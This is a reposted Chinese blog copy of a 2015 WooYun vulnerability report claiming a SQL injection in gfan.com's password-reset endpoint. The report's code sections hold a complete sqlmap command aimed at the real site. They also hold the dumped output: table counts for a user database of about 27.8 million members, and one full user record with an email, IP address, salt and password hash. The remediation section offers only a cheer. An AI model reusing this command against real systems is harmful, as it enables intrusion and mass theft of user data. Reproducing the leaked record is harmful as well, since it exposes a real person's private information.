记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

机锋网存在高危SQL注入可能导致2700W用户数据泄漏

2015-02-09 01:41

code 区域
sqlmap -u "http://my.gfan.com/resete" --data="cellphone=*&confirmPassword=g00dPa%24%24w0rD&password=g00dPa%24%24w0rD&uid=" --dbms=MySQL --risk=3 --level=5 --count -D ucenter --threads=10

漏洞证明:

code 区域
Database: ucenter

+-------------------------+---------+

| Table | Entries |

+-------------------------+---------+

| uc_memberfields | 27862576 |

| uc_members | 27862067 |

| uc_friends | 9853831 |

| uc_cloudphonelog | 3636389 |

| uc_pms | 3634833 |

| uc_token | 1702842 |

| uc_newpm | 650846 |

| uc_pm_members | 515138 |

| uc_pm_indexes | 436883 |

| uc_pm_lists | 274433 |

| uc_cloudphone | 210108 |

| uc_mms_log | 86567 |

| uc_pm_messages_8 | 44385 |

| uc_pm_messages_4 | 44165 |

| uc_pm_messages_2 | 43860 |

| uc_pm_messages_0 | 43800 |

| uc_pm_messages_5 | 43590 |

| uc_pm_messages_9 | 43586 |

| uc_pm_messages_3 | 43379 |

| uc_pm_messages_1 | 43298 |

| uc_pm_messages_7 | 43199 |

| uc_pm_messages_6 | 43041 |

Table: uc_members

[1 entry]

+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+

| uid | myid | myidkey | flag | salt | regip | email | secques | regdate | username | g_volume | password | resetname | phone_imei | lastloginip | is_assistant | lastlogintime |

+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+

| 1008 | <blank> | <blank> | NULL | b54445 | 116.30.184.219 | szwzx44h@163.com | <blank> | 1239851857 | lookb | 10 | cd50675168dbe5cc43d437e7e302c66f | 0 | <blank> | 11630 | 0 | 1243392500 |

+------+---------+---------+------+--------+----------------+------------------+---------+------------+----------+----------+----------------------------------+-----------+------------+-------------+--------------+---------------+

修复方案:

加油


知识来源: www.wooyun.org/bugs/wooyun-2015-088560

阅读:112198 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“机锋网存在高危SQL注入可能导致2700W用户数据泄漏”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词